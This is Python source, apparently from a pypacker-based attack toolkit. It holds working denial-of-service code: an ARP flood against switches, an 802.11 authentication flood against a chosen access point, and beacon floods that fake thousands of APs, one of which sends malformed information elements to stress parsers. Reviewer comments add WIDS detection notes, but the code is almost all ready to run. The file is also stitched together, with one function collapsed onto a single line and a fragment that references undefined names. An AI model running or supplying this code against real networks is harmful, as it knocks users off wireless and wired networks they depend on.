def arp_cb(pargs): """ARP DoS, eg for switches""" #logger.debug("%s %s %s %s", pargs.mac_src, pargs.mac_dst, pargs.ip_src, pargs.ip_dst) pkt_arp_req = ethernet.Ethernet(dst=b"\xFF" * 6, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) +\ arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha=b"\xFF" * 6, tpa_s=pargs.ip_dst, op=arp.ARP_OP_REQUEST) pkt_arp_resp = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) + \ arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha_s=pargs.mac_dst, tpa_s=pargs.ip_dst, op=arp.ARP_OP_REPLY) psock = psocket.SocketHndl(iface_name=pargs.iface_name) for cnt in range(pargs.count): # request from various sources mac = pypacker.get_rnd_mac() pkt_arp_req.src = mac pkt_arp_req.arp.sha = mac pkt_arp_req.arp.spa = pypacker.get_rnd_ipv4() psock.send(pkt_arp_req.bin()) # response from various sources mac = pypacker.get_rnd_mac() pkt_arp_resp.src = mac pkt_arp_resp.arp.sha = mac pkt_arp_resp.arp.spa = pypacker.get_rnd_ipv4() psock.send(pkt_arp_resp.bin()) psock.close()
def wifi_authdos_cb(pargs):
    """
    Authentication frames DoS

    Sends ``pargs.count`` 802.11 authentication management frames
    (subtype ``M_AUTH``) addressed to ``pargs.mac_dst`` (also used as BSSID),
    each with a randomised source MAC, on the first channel listed in
    ``pargs.channels``. A progress dot is printed every 16 frames.

    Args:
        pargs: argument namespace; reads ``mac_dst``, ``iface_name``,
            ``channels`` (comma-separated string, first entry used) and
            ``count``.

    Returns:
        None.

    Defender note: the observable is a burst of authentication requests
    from many distinct, never-associated station MACs towards one BSSID —
    a standard WIDS "auth flood" signature.
    """
    radiotap_ieee80211 = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=0, from_ds=0)
    # dst and bssid are both the target AP address.
    auth = ieee80211.IEEE80211.Auth(dst_s=pargs.mac_dst, bssid_s=pargs.mac_dst)
    radiotap_ieee80211_auth = radiotap_ieee80211 + auth
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2)
    channel = int(pargs.channels.split(",")[0])
    # NOTE(review): the log text says "deauth" but the subtype built above is
    # M_AUTH (authentication); the message is misleading.
    logger.debug("sending %d deauth to %r on channel %d", pargs.count, pargs.mac_dst, channel)
    # NOTE(review): recomputes the value already held in `channel`.
    utils.switch_wlan_channel(pargs.iface_name, int(pargs.channels.split(",")[0]))
    for cnt in range(pargs.count):
        # Progress indicator every 16th frame.
        if cnt & 15 == 0:
            print(".", end="")
            sys.stdout.flush()
        auth.src = pypacker.get_rnd_mac()
        try:
            psock_send.send(radiotap_ieee80211_auth.bin())
        except socket.timeout:
            # timeout on sending? that's ok
            pass
    print("")
    # NOTE(review): not closed if a non-timeout exception escapes the loop.
    psock_send.close()
def send_auth(mac):
    """Send authentications to ap having mac 'mac'

    Sends up to 1,000,000 copies of the module-level ``auth_req_orig`` frame,
    replacing the Auth-layer source MAC with a random one before each send,
    and prints a packets-per-second figure every 500 frames.

    Args:
        mac: NOTE(review) — unused; the destination AP is whatever
            ``auth_req_orig`` already carries, not this argument.

    Returns:
        None.

    Raises:
        ZeroDivisionError: possible on the first iteration (``i == 0``) if
            ``time.time()`` has not advanced since ``start_time`` (coarse
            clocks), since ``diff`` is then exactly ``0.0``.
    """
    # Work on a copy so the module-level template is never mutated.
    auth_req = copy.deepcopy(auth_req_orig)
    start_time = time.time()
    for i in range(1000000):
        if i % 500 == 0:
            diff = time.time() - start_time
            print("%d pps" % (i / diff))
        auth_req[ieee80211.IEEE80211.Auth].src = pypacker.get_rnd_mac()
        try:
            # NOTE(review): `psocket` is used here as an object with a send()
            # method; elsewhere in this file `psocket` names the module that
            # provides SocketHndl — verify which binding is in scope here.
            psocket.send(auth_req.bin())
        except socket.timeout:
            # timeout on sending? that's ok
            pass
def send_beacon(_):
    """Send beacon having mac 'mac'

    Emits beacons for ~10,000 fabricated access points built from the
    module-level ``beacon_orig`` template. Each fabricated AP gets a random
    MAC (used as both source and BSSID) and a random 10-character SSID of
    upper-case letters and digits, and is advertised with 100 beacons whose
    sequence number and timestamp count 0..99.

    Args:
        _: ignored (the docstring's 'mac' is not a parameter; MACs are random).

    Returns:
        None.

    Defender note: many BSSIDs appearing from one radio, each with a short
    lifetime and restarting timestamps/sequence numbers, is the signature
    WIDS "rogue/fake AP flood" detectors look for.
    """
    beacon = copy.deepcopy(beacon_orig)
    start_time = time.time()
    aps_per_channel = 5
    current_channel = 1
    for i in range(1, 10000):
        if i % 100 == 0:
            diff = time.time() - start_time
            print("%d pps" % (i / diff))
        # Every `aps_per_channel` APs advance the channel counter through 1..12;
        # the actual radio switch below is commented out, so this only changes
        # the local variable.
        if i % aps_per_channel == 0:
            current_channel += 1
            current_channel %= 13
            if current_channel == 0:
                current_channel = 1
            # utils.switch_wlan_channel(wlan_monitor_if, current_channel)
        _beacon = beacon[ieee80211.IEEE80211.Beacon]
        mac = pypacker.get_rnd_mac()
        _beacon.src = mac
        _beacon.bssid = mac
        # set new ssid
        _beacon.params[0].body_bytes = bytes("".join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)), "ascii")
        # print(_beacon.params[0].body_bytes)
        _beacon.seq = 0
        # print(_beacon)
        try:
            for x in range(100):
                # send multiple beacons for every ap
                psocket.send(beacon.bin())
                # seq/ts are updated after the send, so the first frame of each
                # AP goes out with seq 0 and the ts left over from the last AP.
                _beacon.seq = x
                # _beacon.ts = x << (8*7)
                _beacon.ts = x
        except socket.timeout:
            # timeout on sending? that's ok
            pass
import time # name of monitor interface to use wlan_monitor_if = "prism0" # MAC address of access point ap_mac = "00:11:22:33:44:55" mon_sock = psocket.SocketHndl(wlan_monitor_if) auth_req = prism(len=24) +\ ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_AUTH, to_ds=1, from_ds=0) +\ ieee80211.IEEE80211.MGMTFrame(dst_s=ap_mac, bssid_s=ap_mac) +\ ieee80211.IEEE80211.Auth(auth_seq=1) print("starting DOS attack on AP %s" % ap_mac) for i in range(10000): #drvinfo = radiotap.Radiotap(raw_bytes) drvinfo = prism.Prism(raw_bytes) start_time = time.time() if i % 100 == 0: diff = time.time()-start_time print("%d pps" % (100/diff) ) try: auth_req[ieee80211.IEEE80211.MGMTFrame].src = pypacker.get_rnd_mac() psocket.send(auth_req.bin()) except Exception as e: mon_sock.close() print(e)
def wifi_ap_ie_cb(pargs):
    """
    Create fake APs using various IEs

    For each of ``pargs.count`` rounds and each channel, switches the radio to
    that channel and emits beacons for 256 fabricated APs. The sixth IE of
    every beacon has its element id set to 0..255 in turn while its declared
    ``len`` (255) stays larger than the 16-byte body it actually carries;
    each fabricated AP is sent ``PACKETS_PER_CHANNEL`` (3) beacons with a
    random MAC/BSSID and a random ESSID.

    Args:
        pargs: argument namespace; reads ``channels`` (comma-separated string
            or None → all channels of ``iface_name``), ``iface_name`` and
            ``count``; sets ``is_running`` to True and stops early if it is
            cleared elsewhere.

    Returns:
        None.

    Defender note: the transmitted frames contain an information element
    whose length field exceeds the remaining frame — the case every 802.11
    parser must bound-check. A WIDS sees 256 new BSSIDs per channel per round.
    """
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    beacon_orig = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
        ieee80211.IEEE80211.Beacon(
            dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
            src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
            # params[0]: SSID, params[1]: supported rates, params[2]: DS/channel,
            # params[3]: TIM, params[4]: ERP, params[5]: the IE whose id is cycled
            # below. Note params[5] declares len=255 but carries only 16 bytes.
            params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
                ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
                ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
                ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
                ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00"),
                ieee80211.IEEE80211.IE(id=0x00, len=255, body_bytes=b"\x00"*16),
            ]
        )
    beacon = copy.deepcopy(beacon_orig)
    _beacon = beacon[ieee80211.IEEE80211.Beacon]
    mac = pypacker.get_rnd_mac()
    essid = "012"
    _beacon.src = mac
    _beacon.bssid = mac
    _beacon.params[0].body_bytes = bytes(essid, "ascii")
    _beacon.params[0].len = len(essid)
    _beacon.params[2].body_bytes = pack_B(channels[0])
    _beacon.seq = 0
    # adaptive sleeptime due to full buffer on fast sending
    sleeptime = 0.000001
    pargs.is_running = True
    logger.info("faking APs on the following channels %r", channels)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2)
    # NOTE(review): ie_cnt is incremented below but never read.
    ie_cnt = 0
    pkt_cnt = 0
    PACKETS_PER_CHANNEL = 3

    for _ in range(pargs.count):
        if not pargs.is_running:
            break
        for channel in channels:
            if pkt_cnt % (256) == 0:
                print("%d packets sent, ch: %d \r" % (pkt_cnt, channel), end="")
                sys.stdout.flush()
            _beacon.params[2].body_bytes = pack_B(channel)
            utils.switch_wlan_channel(pargs.iface_name, channel)
            #logger.info("AP on channel %d: %s", channel, _beacon.params[0].body_bytes)
            # Counts APs (256 per channel), not frames, and is bumped before the
            # sends happen — so it overstates on a partial/failed channel.
            pkt_cnt += 256
            try:
                for ie_id in range(256):
                    _beacon.params[5].id = ie_id
                    mac = pypacker.get_rnd_mac()
                    _beacon.src = mac
                    _beacon.bssid = mac
                    _beacon.params[0].body_bytes = get_random_essid()
                    _beacon.params[0].len = len(_beacon.params[0].body_bytes)
                    for _ in range(PACKETS_PER_CHANNEL):
                        _beacon.seq = ie_id
                        # _beacon.ts = x << (8*7)
                        _beacon.ts = ie_id * 20
                        # time.sleep(0.01)
                        psock_send.send(beacon.bin())
                        time.sleep(sleeptime)
            except socket.timeout:
                # timeout on sending? that's ok
                pass
            except OSError:
                # Any other OSError is treated as "tx buffer full": back off
                # tenfold and abandon the rest of this channel's 256 APs.
                sleeptime *= 10
                print()
                logger.warning(
                    "buffer full, new sleeptime: %03.6fs, waiting...", sleeptime)
                time.sleep(1)
            ie_cnt = (ie_cnt + 1) & 0xFF
    psock_send.close()
def wifi_ap_cb(pargs):
    """
    Create a massive amount of fake APs

    Stays on the first configured channel and, for ``pargs.count`` iterations,
    emits ``PACKETS_PER_CHANNEL`` (3) beacons for one fabricated AP per
    iteration. MAC/BSSID and ESSID are randomised but their last three bytes
    are replaced by a counter-derived suffix; beacon interval is 0xFFFF.

    Args:
        pargs: argument namespace; reads ``channels`` (comma-separated string
            or None → all channels of ``iface_name``), ``iface_name`` and
            ``count``; sets ``is_running`` to True and stops early if it is
            cleared elsewhere.

    Returns:
        None.

    Defender note: a large population of BSSIDs on one channel, all with the
    maximum beacon interval (0xFFFF) and tightly correlated MAC/ESSID
    suffixes, is a strong fake-AP-flood indicator for a WIDS.
    """
    if pargs.channels is not None:
        channels = [int(channel) for channel in pargs.channels.split(",")]
    else:
        channels = utils.get_available_wlan_channels(pargs.iface_name)

    beacon_orig = radiotap.Radiotap() + \
        ieee80211.IEEE80211(type=ieee80211.MGMT_TYPE, subtype=ieee80211.M_BEACON, to_ds=0, from_ds=0) + \
        ieee80211.IEEE80211.Beacon(
            dst=b"\xFF\xFF\xFF\xFF\xFF\xFF",
            src=b"\xFF\xFF\xFF\xFF\xFF\xFF",
            # params[0]: SSID, params[1]: supported rates, params[2]: DS/channel,
            # params[3]: TIM, params[4]: ERP.
            params=[ieee80211.IEEE80211.IE(id=0, len=10, body_bytes=b"\x00" * 10),
                ieee80211.IEEE80211.IE(id=1, len=8, body_bytes=b"\x82\x84\x8b\x96\x0c\x12\x18\x24"),
                ieee80211.IEEE80211.IE(id=3, len=1, body_bytes=b"\x04"),
                ieee80211.IEEE80211.IE(id=5, len=4, body_bytes=b"\x00\x01\x00\x00"),
                ieee80211.IEEE80211.IE(id=0x2A, len=1, body_bytes=b"\x00")])
    beacon = copy.deepcopy(beacon_orig)
    _beacon = beacon[ieee80211.IEEE80211.Beacon]
    mac = pypacker.get_rnd_mac()
    essid = "FreeHotspot"
    _beacon.src = mac
    _beacon.bssid = mac
    _beacon.params[0].body_bytes = bytes(essid, "ascii")
    _beacon.params[0].len = len(essid)
    _beacon.params[2].body_bytes = pack_B(channels[0])
    _beacon.seq = 0
    # Maximum possible beacon interval.
    _beacon.interval = 0xFFFF
    # adaptive sleeptime due to full buffer on fast sending
    # NOTE(review): the only time.sleep(sleeptime) call is commented out below,
    # so this value currently affects nothing but the warning message.
    sleeptime = 0.000001
    rand_mac = True
    rand_essid = True
    pargs.is_running = True
    logger.info("faking APs on the following channels %r", channels)
    psock_send = psocket.SocketHndl(iface_name=pargs.iface_name, mode=psocket.SocketHndl.MODE_LAYER_2)
    cnt = 0
    rounds = 0
    PACKETS_PER_CHANNEL = 3
    starttime = time.time()
    # Only channels[0] is ever used; the radio is switched once, up front.
    _beacon.params[2].body_bytes = pack_B(channels[0])
    utils.switch_wlan_channel(pargs.iface_name, channels[0])

    for _ in range(pargs.count):
        if not pargs.is_running:
            break
        if cnt & 0xF == 0:
            print("%d packets sent\r" % (cnt * PACKETS_PER_CHANNEL), end="")
            sys.stdout.flush()
        # NOTE(review): starttime is never reset, so once 60 s have elapsed this
        # branch fires on every iteration — rounds then grows per packet and
        # cnt is reset to 0 each time. Presumably meant to trigger once a
        # minute; confirm intent.
        if time.time() - starttime > 60:
            rounds += 1
            cnt = 0
        # presumably a 3-byte counter suffix shared by MAC and ESSID below —
        # depends on what unpack_I returns; verify against its definition.
        cnt_bts = unpack_I(cnt)[0][-3:]
        cnt += 1
        if rand_mac:
            mac = pypacker.get_rnd_mac()[:3] + cnt_bts
            _beacon.src = mac
            _beacon.bssid = mac
        if rand_essid:
            _beacon.params[0].body_bytes = get_random_essid()[:-3] + cnt_bts
            _beacon.params[0].len = len(_beacon.params[0].body_bytes)
        try:
            # seq/ts start from a per-round base and advance per frame.
            _beacon.seq = 1000 + rounds * PACKETS_PER_CHANNEL
            _beacon.ts = 2000 + rounds * 0x100 * PACKETS_PER_CHANNEL
            for cnt_ap in range(PACKETS_PER_CHANNEL):
                # send multiple beacons for every ap
                psock_send.send(beacon.bin())
                _beacon.seq += 1
                _beacon.ts += 0x100
                #time.sleep(sleeptime)
        except socket.timeout:
            # timeout on sending? that's ok
            pass
        except OSError:
            # Any other OSError is treated as "tx buffer full": back off tenfold.
            sleeptime *= 10
            print()
            logger.warning("buffer full, new sleeptime: %03.6fs, waiting...", sleeptime)
            time.sleep(1)
    psock_send.close()